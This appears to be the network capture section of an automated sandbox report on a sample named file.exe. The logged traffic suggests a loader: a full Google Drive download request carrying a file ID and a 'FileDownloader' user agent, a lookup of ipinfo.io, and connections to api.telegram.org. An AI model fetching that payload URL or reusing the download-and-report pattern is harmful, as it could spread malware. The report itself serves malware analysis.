Dec 12, 2024 16:53:51.883696079 CET	443	49740	34.117.59.81	192.168.2.9
Dec 12, 2024 16:53:51.883789062 CET	49740	443	192.168.2.9	34.117.59.81
Dec 12, 2024 16:53:51.884094000 CET	49740	443	192.168.2.9	34.117.59.81
Dec 12, 2024 16:53:51.927330017 CET	443	49740	34.117.59.81	192.168.2.9
Dec 12, 2024 16:53:52.057642937 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.057785034 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.073654890 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.073846102 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.177372932 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.177479029 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.177607059 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.177659035 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.181468010 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.181580067 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.249440908 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.249561071 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.253137112 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.253248930 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.253262043 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.253319025 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.258544922 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.258618116 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.266011953 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.266057014 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.267252922 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.267301083 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.274720907 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.274831057 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.278166056 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.278243065 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.283500910 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.283566952 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.292663097 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.292737961 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.295839071 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.295969963 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.305963993 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.306050062 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.308727026 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.308790922 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.319014072 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.319070101 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.321800947 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.321852922 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.331701994 CET	443	49740	34.117.59.81	192.168.2.9
Dec 12, 2024 16:53:52.331780910 CET	49740	443	192.168.2.9	34.117.59.81
Dec 12, 2024 16:53:52.331787109 CET	443	49740	34.117.59.81	192.168.2.9
Dec 12, 2024 16:53:52.331835032 CET	49740	443	192.168.2.9	34.117.59.81
Dec 12, 2024 16:53:52.332793951 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.332851887 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.335930109 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.335978031 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.341917992 CET	49740	443	192.168.2.9	34.117.59.81
Dec 12, 2024 16:53:52.341934919 CET	443	49740	34.117.59.81	192.168.2.9
Dec 12, 2024 16:53:52.346935987 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.347001076 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.348622084 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.348671913 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.360567093 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.360647917 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.363435984 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.363487959 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.373665094 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.373728037 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.373739958 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.373788118 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.387557983 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.387708902 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.387716055 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.387759924 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.400852919 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.400970936 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.441399097 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.441499949 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.441526890 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.441570997 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.443623066 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.443671942 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.448201895 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.448277950 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.448286057 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.448328018 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.452101946 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.452172995 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.452497959 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.452541113 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.461458921 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.461499929 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.461514950 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.461525917 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.461549044 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.461561918 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.472193003 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.472280025 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.472291946 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.472448111 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.483270884 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.483362913 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.483371019 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.483529091 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.492949009 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.493055105 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.493062019 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.493103027 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.503094912 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.503177881 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.503386974 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.503526926 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.513029099 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.513093948 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.513150930 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.513195038 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.523215055 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.523283958 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.523397923 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.523438931 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.533978939 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.534017086 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.534027100 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.534068108 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.544518948 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.544569969 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.544576883 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.544620037 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.552972078 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.553039074 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.553044081 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.553086042 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.561913013 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.561979055 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.561985970 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.562022924 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.571672916 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.571762085 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.571805954 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.571954966 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.579885960 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.579961061 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.579974890 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.580116034 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.580122948 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.580163002 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.581243992 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.581346989 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.588152885 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.588222980 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.589492083 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.589549065 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.596864939 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.596937895 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.597870111 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.597924948 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.603440046 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.603532076 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.604985952 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.605055094 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.609472036 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.609538078 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.610605955 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.610657930 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.615803003 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.615890980 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.616822958 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.616883039 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.621947050 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.622014999 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.623486996 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.623548985 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.633757114 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.633824110 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.634793997 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.634857893 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.635551929 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.635612965 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.638020992 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.638077021 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.639475107 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.639548063 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.641354084 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.641407013 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.644867897 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.644934893 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.645908117 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.645958900 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.650100946 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.650167942 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.651438951 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.651493073 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.654993057 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.655102968 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.655109882 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.655159950 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.660455942 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.660506010 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.660520077 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.660562992 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.665561914 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.665611982 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.665627956 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.665673018 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.670542002 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.670655012 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.670945883 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.671001911 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.676515102 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.676575899 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.677419901 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.677473068 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.680466890 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.680515051 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.680526018 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.680566072 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.685307026 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.685374022 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.685389042 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.685437918 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.690730095 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.690777063 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.690787077 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.690833092 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.695323944 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.695415974 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.695426941 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.695471048 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.700041056 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.700145960 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.700748920 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.700802088 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.705101013 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.705179930 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.705189943 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.705260992 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.710191965 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.710289955 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.710299969 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.710338116 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.710462093 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.710494995 CET	443	49725	142.250.181.65	192.168.2.9
Dec 12, 2024 16:53:52.710628033 CET	49725	443	192.168.2.9	142.250.181.65
Dec 12, 2024 16:53:52.849251986 CET	49746	443	192.168.2.9	149.154.167.220
Dec 12, 2024 16:53:52.849308968 CET	443	49746	149.154.167.220	192.168.2.9
Dec 12, 2024 16:53:52.849368095 CET	49746	443	192.168.2.9	149.154.167.220
Dec 12, 2024 16:53:52.849739075 CET	49746	443	192.168.2.9	149.154.167.220
Dec 12, 2024 16:53:52.849756956 CET	443	49746	149.154.167.220	192.168.2.9
Dec 12, 2024 16:53:52.865801096 CET	49747	443	192.168.2.9	34.117.59.81
Dec 12, 2024 16:53:52.865843058 CET	443	49747	34.117.59.81	192.168.2.9
Dec 12, 2024 16:53:52.865936041 CET	49747	443	192.168.2.9	34.117.59.81
Dec 12, 2024 16:53:52.866193056 CET	49747	443	192.168.2.9	34.117.59.81
Dec 12, 2024 16:53:52.866206884 CET	443	49747	34.117.59.81	192.168.2.9
Dec 12, 2024 16:53:54.083022118 CET	443	49747	34.117.59.81	192.168.2.9
Dec 12, 2024 16:53:54.083185911 CET	49747	443	192.168.2.9	34.117.59.81
Dec 12, 2024 16:53:54.087306023 CET	49747	443	192.168.2.9	34.117.59.81
Dec 12, 2024 16:53:54.087323904 CET	443	49747	34.117.59.81	192.168.2.9
Dec 12, 2024 16:53:54.088009119 CET	443	49747	34.117.59.81	192.168.2.9
Dec 12, 2024 16:53:54.088095903 CET	49747	443	192.168.2.9	34.117.59.81
Dec 12, 2024 16:53:54.088510036 CET	49747	443	192.168.2.9	34.117.59.81
Dec 12, 2024 16:53:54.131339073 CET	443	49747	34.117.59.81	192.168.2.9
Dec 12, 2024 16:53:54.429742098 CET	443	49746	149.154.167.220	192.168.2.9
Dec 12, 2024 16:53:54.429828882 CET	49746	443	192.168.2.9	149.154.167.220
Dec 12, 2024 16:53:54.433278084 CET	49746	443	192.168.2.9	149.154.167.220
Dec 12, 2024 16:53:54.433291912 CET	443	49746	149.154.167.220	192.168.2.9
Dec 12, 2024 16:53:54.433559895 CET	443	49746	149.154.167.220	192.168.2.9
Dec 12, 2024 16:53:54.433634996 CET	49746	443	192.168.2.9	149.154.167.220
Dec 12, 2024 16:53:54.433955908 CET	49746	443	192.168.2.9	149.154.167.220
Dec 12, 2024 16:53:54.475346088 CET	443	49746	149.154.167.220	192.168.2.9
Dec 12, 2024 16:53:54.647924900 CET	443	49747	34.117.59.81	192.168.2.9
Dec 12, 2024 16:53:54.648111105 CET	443	49747	34.117.59.81	192.168.2.9
Dec 12, 2024 16:53:54.648402929 CET	49747	443	192.168.2.9	34.117.59.81
Dec 12, 2024 16:53:54.649204969 CET	49747	443	192.168.2.9	34.117.59.81
Dec 12, 2024 16:53:54.649228096 CET	443	49747	34.117.59.81	192.168.2.9
Dec 12, 2024 16:53:54.686657906 CET	49749	443	192.168.2.9	149.154.167.220
Dec 12, 2024 16:53:54.686702013 CET	443	49749	149.154.167.220	192.168.2.9
Dec 12, 2024 16:53:54.686927080 CET	49749	443	192.168.2.9	149.154.167.220
Dec 12, 2024 16:53:54.687153101 CET	49749	443	192.168.2.9	149.154.167.220
Dec 12, 2024 16:53:54.687172890 CET	443	49749	149.154.167.220	192.168.2.9
Dec 12, 2024 16:53:54.990364075 CET	443	49746	149.154.167.220	192.168.2.9
Dec 12, 2024 16:53:54.990431070 CET	443	49746	149.154.167.220	192.168.2.9
Dec 12, 2024 16:53:54.990437984 CET	49746	443	192.168.2.9	149.154.167.220
Dec 12, 2024 16:53:54.990489006 CET	49746	443	192.168.2.9	149.154.167.220
Dec 12, 2024 16:53:55.033901930 CET	49746	443	192.168.2.9	149.154.167.220
Dec 12, 2024 16:53:55.033925056 CET	443	49746	149.154.167.220	192.168.2.9
Dec 12, 2024 16:53:56.051106930 CET	443	49749	149.154.167.220	192.168.2.9
Dec 12, 2024 16:53:56.051193953 CET	49749	443	192.168.2.9	149.154.167.220
Dec 12, 2024 16:53:56.070709944 CET	49749	443	192.168.2.9	149.154.167.220
Dec 12, 2024 16:53:56.070739985 CET	443	49749	149.154.167.220	192.168.2.9
Dec 12, 2024 16:53:56.071209908 CET	443	49749	149.154.167.220	192.168.2.9
Dec 12, 2024 16:53:56.071270943 CET	49749	443	192.168.2.9	149.154.167.220
Dec 12, 2024 16:53:56.072076082 CET	49749	443	192.168.2.9	149.154.167.220
Dec 12, 2024 16:53:56.119328022 CET	443	49749	149.154.167.220	192.168.2.9
Dec 12, 2024 16:53:56.607222080 CET	443	49749	149.154.167.220	192.168.2.9
Dec 12, 2024 16:53:56.607292891 CET	443	49749	149.154.167.220	192.168.2.9
Dec 12, 2024 16:53:56.607355118 CET	49749	443	192.168.2.9	149.154.167.220
Dec 12, 2024 16:53:56.607355118 CET	49749	443	192.168.2.9	149.154.167.220
Dec 12, 2024 16:53:56.608234882 CET	49749	443	192.168.2.9	149.154.167.220
Dec 12, 2024 16:53:56.608253956 CET	443	49749	149.154.167.220	192.168.2.9

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 12, 2024 16:53:42.237551928 CET	63471	53	192.168.2.9	1.1.1.1
Dec 12, 2024 16:53:42.374806881 CET	53	63471	1.1.1.1	192.168.2.9
Dec 12, 2024 16:53:45.127674103 CET	59068	53	192.168.2.9	1.1.1.1
Dec 12, 2024 16:53:45.265346050 CET	53	59068	1.1.1.1	192.168.2.9
Dec 12, 2024 16:53:50.515853882 CET	50411	53	192.168.2.9	1.1.1.1
Dec 12, 2024 16:53:50.653062105 CET	53	50411	1.1.1.1	192.168.2.9
Dec 12, 2024 16:53:52.696373940 CET	57069	53	192.168.2.9	1.1.1.1
Dec 12, 2024 16:53:52.835109949 CET	53	57069	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 12, 2024 16:53:42.237551928 CET	192.168.2.9	1.1.1.1	0xed1d	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:53:45.127674103 CET	192.168.2.9	1.1.1.1	0x9b42	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:53:50.515853882 CET	192.168.2.9	1.1.1.1	0xfe43	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:53:52.696373940 CET	192.168.2.9	1.1.1.1	0x61db	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 12, 2024 16:53:36.392852068 CET	1.1.1.1	192.168.2.9	0x80e3	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 16:53:36.392852068 CET	1.1.1.1	192.168.2.9	0x80e3	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:53:42.374806881 CET	1.1.1.1	192.168.2.9	0xed1d	No error (0)	drive.google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:53:45.265346050 CET	1.1.1.1	192.168.2.9	0x9b42	No error (0)	drive.usercontent.google.com		142.250.181.65	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:53:50.653062105 CET	1.1.1.1	192.168.2.9	0xfe43	No error (0)	ipinfo.io		34.117.59.81	A (IP address)	IN (0x0001)	false
Dec 12, 2024 16:53:52.835109949 CET	1.1.1.1	192.168.2.9	0x61db	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

ipinfo.io

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49717	172.217.17.46	443	7456	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:53:44 UTC	150	OUT	GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1 User-Agent: FileDownloader Host: drive.google.com Cache-Control: no-cache
